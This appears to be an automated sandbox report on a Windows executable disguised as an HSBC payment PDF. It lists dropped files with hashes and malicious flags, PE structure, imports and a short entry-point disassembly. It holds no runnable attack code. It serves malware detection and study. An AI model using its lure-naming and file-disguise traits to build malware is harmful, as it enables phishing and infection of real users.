                                                                                                                                                  SHA-512:19449541F0FBFC6777AF7C1FCA50964D4263384EFD2B0139626249B96FB8C5C2C71DA04B83AD91B01BD7014A6B5FF6B8A4AB723FE8686F58AA914AD7C047F338
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1242624
                                                                                                                                                  Entropy (8bit):7.280266378624991
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:HkdpSI+K3S/GWei+qNv2wG3D/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:H6SIGGWei2wG3DLNiXicJFFRGNzj3
                                                                                                                                                  MD5:5DA3CAFF7B6DB6ED124E5F9690E7B126
                                                                                                                                                  SHA1:B2ED8B3ED656B5E5FDA051F415DA1EE5CB60D28F
                                                                                                                                                  SHA-256:0FECD3AB32F7AB8DE77889D2C7B4243B0ADD925045DB2684FE9A75F8982EB8F4
                                                                                                                                                  SHA-512:7A72A77C766188F7BBEFC407A75B4839C50A48136B97902613CC5A4D470260052D28AC2CCF729122EAC4BBD87A43430DE0BBE4ABBCAF7FCB8CE43CD7E4C54B50
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1296896
Entropy (8bit):4.515613987304856
Encrypted:false
SSDEEP:12288:z2iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:zA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:E30FA2BCFDF4D20217D89B9395BE104F
SHA1:B84D3B169EE6940277DA26AECF14CEEB6F00BFB7
SHA-256:CA0EA622049BCDDF47C480A5F39078C5CB3147E505B9211BD09BCBA9E1B10110
SHA-512:417832139A248E384882519532AB9679CAA8FA501B1153B32F7C5C10B1D6CAE1FE3A183E7B8FDE4AA5AACAEF6CBBD1D807A069EB0BE27DADCF989F21A8923FFC
Malicious:true
Reputation:unknown
Process:C:\Windows\System32\msdtc.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.32139010536246265
Encrypted:false
SSDEEP:6:gbyXD8ta/k/uMclF6vMclFq5zr7rsz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+G0Xl:bXD80kqF69Fq5zrx6CzE5Z2+fqjFHXl
MD5:5D3F09112DD1D5BAF458881226B49FF4
SHA1:50FD83C90BAC19209765DCA1899FBC473AED773E
SHA-256:701446DD9576AB8EF558C7424DF4FF1AA3A8AE4E154FE13D0430348A28413BD0
SHA-512:E9591B890CC25E757FBD0172A0C78469B611652E2F975A3028B35FF4DDEB3CB5BAD04EB1F66AEAD12092F60CF9B808F4F5885D85D5F8295F2121D0A7FE12D0B5
Malicious:false
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1667072
Entropy (8bit):4.8231786068713625
Encrypted:false
SSDEEP:24576:uAL3UTL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:uAL3UnLNiXicJFFRGNzj3
MD5:56CCD164B03367A0F39A8360E82CB3D1
SHA1:472F38AAD6B2965A0867A65566DCFE2B8609A76A
SHA-256:873747021FB8E28F0F2DAA7A055C46BEC243A81E337AC1550E6FA45E6D8BF570
SHA-512:1221BD8637F11C11DB00593B9D25BC79081883364968FC5F68DAD361F42E9DD66FE193E471DF772A23006E8D1676C1D659BC3A71B02E53473C90201A302AAA2F
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1391616
Entropy (8bit):4.703252925773147
Encrypted:false
SSDEEP:24576:KOH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KOHLNiXicJFFRGNzj3
MD5:55154595EBC76876D16839386F302C81
SHA1:9FBE9DA2C91E79D49AB4BF750722F9EBD0C325A8
SHA-256:F6F6C3AEA0C463F77AA197FEAAFDB43C51B87BF5519C2CD8181A681EC85B10D5
SHA-512:A1A6AA7180335A44DB7C0ACDEF399BC46BF7A4063DC0BCCCBE34B90D3C27E4297E6864E03DE5D1FEE7263E9D10ABD4618EB728AF0448B81B340711BE12581CB0
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):7.094193200650157
Encrypted:false
SSDEEP:24576:Q3frCoQ9tLsiLPLe24CxruW4bIhllL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Q3fIsIPLkCNuVbIhDLLNiXicJFFRGNzb
MD5:DBC131B4C06BA48B2F21338953515BB3
SHA1:95FC8894DE2C361EFD0749D5A6D6A2C8BC8B60FC
SHA-256:5405008D2E960735F7A83216BFAAF3EBA4DA954D0B082D7BDEE922F1DE1A0450
SHA-512:EED4E61D0F2B656AAF53BFAFC361F8CB0134BEF0F25D6C78AFBC558D9E74315482BE12FA9DCF7378A29A8B6C9442EDADAB0109B3D6D6080E16881B9EC6C16CB2
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1846784
Entropy (8bit):6.932723041634829
Encrypted:false
SSDEEP:49152:yF2YuHNETovAvNYf8km0LNiXicJFFRGNzj3:76BCf8kH7wRGpj3
MD5:138460F80D6D680988322149C0DA8337
SHA1:A49ECB4125467526F003F2603A7C64B756991066
SHA-256:470A8AA885F76ED252C8780883B9400ECC26450955754A02035FFEC93D454A81
SHA-512:BD7707DB9E310052923F068209C9DEAEBE03C4E145E9AFDCBD4B93B7DEE8027D23B5E0B6D687613DCA387696FA0FB6B7AD65E79A4FD01AF7C216DACE4FB90B28
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):7.230996176888668
Encrypted:false
SSDEEP:24576:1iW6ZvAKF5i/dN9Bde9j9Trk+FH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:1YxF50b9Bdu9TxhLNiXicJFFRGNzj3
MD5:A5C5CBD638C50F62E6B1C909D40EA394
SHA1:035C648D6B299E434AFFCBD42BA03525989AAC1B
SHA-256:A792CDCC53ACCC9F38E1699F293CBE4678523720351E32A89CB75827090E33A9
SHA-512:46F3629EB5D1E7E1905818BE8D0D78022083C5319069A18E37ACC066A730D34A5C4B274BCA06B446AA1E9E5AFE69356F5F2A4D11657461DDBCD6DDBE12F39AB0
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1611264
Entropy (8bit):5.048868878670084
Encrypted:false
SSDEEP:24576:xJnJ5D3WXe/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xJnJ5DGXeLNiXicJFFRGNzj3
MD5:978A54C9D759FF632658D6B5D6F278B3
SHA1:4AB50C048C98C90EE9C55BA7871C00712A19F3E0
SHA-256:457357CA06F1A07A060D09847D642AE7F774D8DF2781B66AAECEF5C297453DD4
SHA-512:0BA290E087350101E2DE9A1039C8DFBD8A38E996A9591B04E6ADD230417EB6597B7261765DE1C09C709EB07C97DDBBB81BD5CE933691DA051E2BAD541389A9AB
Malicious:true
Reputation:unknown
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2075136
Entropy (8bit):6.729895383765107
Encrypted:false
SSDEEP:49152:zPK8mJYTerDjfJ2313e1mP1MdnUtLNiXicJFFRGNzj3:p7wRGpj3
MD5:AAE3D9BE8A47852DE9975AD94447C6D8
SHA1:47C6E13A2E122245EDE5D06A97A0F5FD7E03F47B
SHA-256:4EEB25B011BDE7D241AF1C9E3FFDE975FF52C7679359EE9F83DABED53E6B4D3B
SHA-512:D926EE9B41BC05EBCBF5B2E312280DCB6B0CEEDD94ED4DDEC9BA5A08070733D36FA5BFD659DBD6A885066D01500BF2B4625020ED229F3ABF4E2A9F43FF3D0D8B
Malicious:true
Reputation:unknown
                                                                                                                                                  Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1381376
                                                                                                                                                  Entropy (8bit):4.682163561003341
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:3ne/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3neLNiXicJFFRGNzj3
                                                                                                                                                  MD5:463F7F1E3383EFC2DF1C247DF13BE675
                                                                                                                                                  SHA1:E7C88695BD28C64916BE2BD7851CED3FD372EFA0
                                                                                                                                                  SHA-256:FDA1EF5B43C2AD181E75740138C935C9BB9CFCD13E63ADA3689F608B25F384A0
                                                                                                                                                  SHA-512:571A9949B079ACAB0C4BDAC158612CE6017016D1587E45F92F4B3FBFCDB7D5EE63BE4F48CA207B211D0D5527A4B731879886A64742C3E783968658156BD4CF83
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1434112
                                                                                                                                                  Entropy (8bit):4.680799420679136
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:9IyR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:9IOLNiXicJFFRGNzj3
                                                                                                                                                  MD5:51874DD725C538D547DFE65FED3A93E2
                                                                                                                                                  SHA1:91EECFC76DBF59017C4514A5DD936343DB74C104
                                                                                                                                                  SHA-256:CA480732910F54E3F7DBED72AB4B7CB446B722F00648AAA773EDFEEC7CBB8CFE
                                                                                                                                                  SHA-512:1E05536BD49790960CB431210444519737B1CD992B7349FD657A03C4BF8B3774166E56466E3FB8A7598249EAAA66F6ACC8335889B244A3148401C9EA1A3A1EB0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1355264
                                                                                                                                                  Entropy (8bit):4.598885488341672
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:N4K/iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:JL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:D7A658B63143C365E02DD9D724AD3840
                                                                                                                                                  SHA1:EB1E3170724AEAE9AF30E61CC6FACDF957DEA873
                                                                                                                                                  SHA-256:45949E2186CE94804ED4EC0E01971FDDB69CFAB80226E5F55041A4BAAF7FB406
                                                                                                                                                  SHA-512:E14769CAC89956AFE04CAE56384B31BE29C07F8BE38FF36E584B64FF5BFDECAFD69DAD664E7976DA96A1A7DB31983A97BE0036F8F0870E79477B17F9D1412A31
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1302528
                                                                                                                                                  Entropy (8bit):4.527040434349369
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:MyjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:5X/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:772AEFCF949CAADFB515863053AC8C10
                                                                                                                                                  SHA1:CD6841C3254DC4E2BC897E4F5A4427746D475734
                                                                                                                                                  SHA-256:5A63AE25B170F220DFD3917FB99556EA2D27374A14031825B94BF873C247CE94
                                                                                                                                                  SHA-512:F4BD2427D42662042A47E6BFB0E37C5B6B2FBB0298AF0E58343F4266ED777F0B1AF4AFD78567F238C82A10DCD5470AFFF406F3A1B1DB0FD2010DDF7C8FAB9578
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1303552
                                                                                                                                                  Entropy (8bit):7.160771851397377
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:uZ0FxT1UoYr99GdcJKa/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ewWsaLNiXicJFFRGNzj3
                                                                                                                                                  MD5:9B69326495A6A2E148AF298DBBFA354E
                                                                                                                                                  SHA1:82815DC8511D21F4C1FE29B141281B3BEE33E8E0
                                                                                                                                                  SHA-256:4DDFEE120EA068531DA75B2B8F648285530A956AEB1A378B65350723061197D3
                                                                                                                                                  SHA-512:258529C02ECE28F4171E7B0AA0C8F6629B0FFC4D3DD75FF97F60AEB6A06FF40506B57B463A5411E65CEB93012F61134DE8FBF4E661F82C8BAD8C9DAE3B540364
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1495040
                                                                                                                                                  Entropy (8bit):4.819230946517786
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:WyocDApp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:rocDAppLNiXicJFFRGNzj3
                                                                                                                                                  MD5:42D1E4DE254C4ADA4E059B64BB6A2DA2
                                                                                                                                                  SHA1:BB8DCEC95945C60B4C30973CEC4F742C0150DDD4
                                                                                                                                                  SHA-256:EF251D95C25C2E13F342F74DB95F09447459AC67037C13854C0D4BAE9E269B6E
                                                                                                                                                  SHA-512:358F9828583B30C609E8845DE4EB30852416FCB057D2AD7452609B14D0F93DB1DD41F44CA62953F5976A7A356A1B9C01B01EBBCEF55EE5942531321E027104F1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2164736
                                                                                                                                                  Entropy (8bit):7.056807539909686
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:2WcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IKNLNiXicJFFRGNzj3:A0zuNIL7wRGpj3
                                                                                                                                                  MD5:A4B1E47A80405B400B4460F9F65BA8E2
                                                                                                                                                  SHA1:2F8D7999DDE29E014E9AAEF7AE31E83FA61A0EC6
                                                                                                                                                  SHA-256:B349770F612AFAFA4C40BCBCC5C24CBCAA4855D93F7514316165531A72173AE7
                                                                                                                                                  SHA-512:4FF1019AA404E4D48D7397753DE677AA89106142C2199C3E67342EBD58B7FEC0DA93A80C7FACB802D438568B55ACB960C024D5EFC6010563CC6DCE641A41109F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.10003927087197158
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:s93l/k/uMclF6vMclFq5zrscAXNOn+SkUeYDwDzym9j:s9V/kqF69Fq5zraO+pawHymZ
                                                                                                                                                  MD5:88BAEEDA6B424A129F7F84FDBFBB1F77
                                                                                                                                                  SHA1:BEF6A8A160AC6D8070D969FCB2CA1833B4B9A38C
                                                                                                                                                  SHA-256:0D6DB9F917DA4EA7770582FFD55EC42F5999BDF92E110CFFD04CDC1D8036424A
                                                                                                                                                  SHA-512:385FFDE111C1BCFB10C9C72A57D7E48C5216563BEC15431771BBAF0A040FEC6AC101ED2E09F8CCE4B44D60669EF754F8776BB5CB22DBE09C84C80BD8589EF0BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):65536
                                                                                                                                                  Entropy (8bit):0.10143017812085664
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:Vl6Vkl963l/k/uMclF6vMclFq5zrYXXNMu3n+SkUeYDwDzyMFkl9jb:Vl6VklAV/kqF69Fq5zrYtX+pawHyekld
                                                                                                                                                  MD5:64C903E0BE604F3C55244D021D09645E
                                                                                                                                                  SHA1:DB4F1C2EA6C8A272EECA71497120659B0130A2F4
                                                                                                                                                  SHA-256:945A7C52F9FFF79679073B13A56DBC10930F015C59EFF4973A6BDF4AF1B3535D
                                                                                                                                                  SHA-512:81AEB8CE23E7943809C194B4FC4C1902DFF6275FC93CEFC2BD5EDD262473C783489947EFA3B5C8AC312FD1DDFEA50A9FE94D0054A13BCF3B4CFF4D4C10970556
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
Process:C:\Windows\System32\Spectrum.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.09864643853404176
Encrypted:false
SSDEEP:6:u5wl43Nk/uMclF6vMclFq5zrbXNIn+SkUeYDwDzyjlhr:uG49kqF69Fq5zr5I+pawHyZF
MD5:46C0D3FAD0A9A7025396CDA398B47A6A
SHA1:621C3CEA50FCAF27A9C673C9C934F94BB6A08F5C
SHA-256:1CFC79415019460B5CC2015B64DEBCD230F6C25B0492D13FB7F479E38C61FB3B
SHA-512:6C3BF5CD0FADE35D518090CAE7F2859868C87E1F56060C61B2B980918E3B663EE960DF00507002FDC0F49407706D66D5869C401B70D57416118FE4D7EAACF73B
Malicious:false
Reputation:unknown
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.383615153647671
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File size:1'539'072 bytes
MD5:999146408efd1a704966ca4c1c8ce4b7
SHA1:0dc0a9373154d562c47c04d27977f483d385ea1b
SHA256:a36f4ee96ff62eee2a503838850d7dce90aabc36a704b742b6814f187618f3c1
SHA512:8e99a68c23b8185902c73c19d980f4fc309002498bfc1344fded06dd1c001927e9597430e2c7afdfed30a913a48116750d652301cba05dc13d2ed04156be6389
SSDEEP:24576:bu6J3kO0c+JY5UZ+XC0kGso6FaboeVGQjWYy/TwSfVcYG3K/cJHlnFR+IGNe8j3w:VJ0c++OCvkGs9FabozYyLNiXicJFFRGN
TLSH:3D65DF2273DDC360CB769173BF29B7016EBB7C654630B85B2F881D7DA960262162C763
Icon Hash:aaf3e3e3938382a0
Entrypoint:0x427dcd
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x67584016 [Tue Dec 10 13:20:22 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:afcdf79be1557326c854b6e20cb900a7
Instruction
call 00007F50C934D9CAh
jmp 00007F50C9340794h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F50C934091Ah
cmp edi, eax
jc 00007F50C9340C7Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F50C9340919h
rep movsb
jmp 00007F50C9340C2Ch
cmp ecx, 00000080h
jc 00007F50C9340AE4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F50C9340920h
bt dword ptr [004BE324h], 01h
jc 00007F50C9340DF0h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F50C9340ABDh
test edi, 00000003h
jne 00007F50C9340ACEh
test esi, 00000003h
jne 00007F50C9340AADh
bt edi, 02h
jnc 00007F50C934091Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F50C9340923h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F50C9340975h
bt esi, 03h
jnc 00007F50C93409C8h
Programming Language:
• [ASM] VS2013 build 21005
• [ C ] VS2013 build 21005
• [C++] VS2013 build 21005
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2013 UPD4 build 31101
• [RES] VS2013 build 21005
• [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x215d4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dcc4 | 0x8de00 | 97dfc7b2f276cc62b8add396864a3c11 | False | 0.5728679102422908 | data | 6.676121964802359 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x215d4 | 0x21600 | e28ac6d840d9d7c4d039c1d19eeb3423 | False | 0.8039633075842697 | data | 7.541829559863074 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe9000 | 0x96000 | 0x95000 | 591e6f13fe6b350236243071c1222817 | False | 0.9705409107592282 | data | 7.920472610831056 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x1889a | data | | | 1.0004079358446263
RT_GROUP_ICON | 0xe8054 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0xe80cc | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xe80e0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xe80f4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xe8108 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0xe81e4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
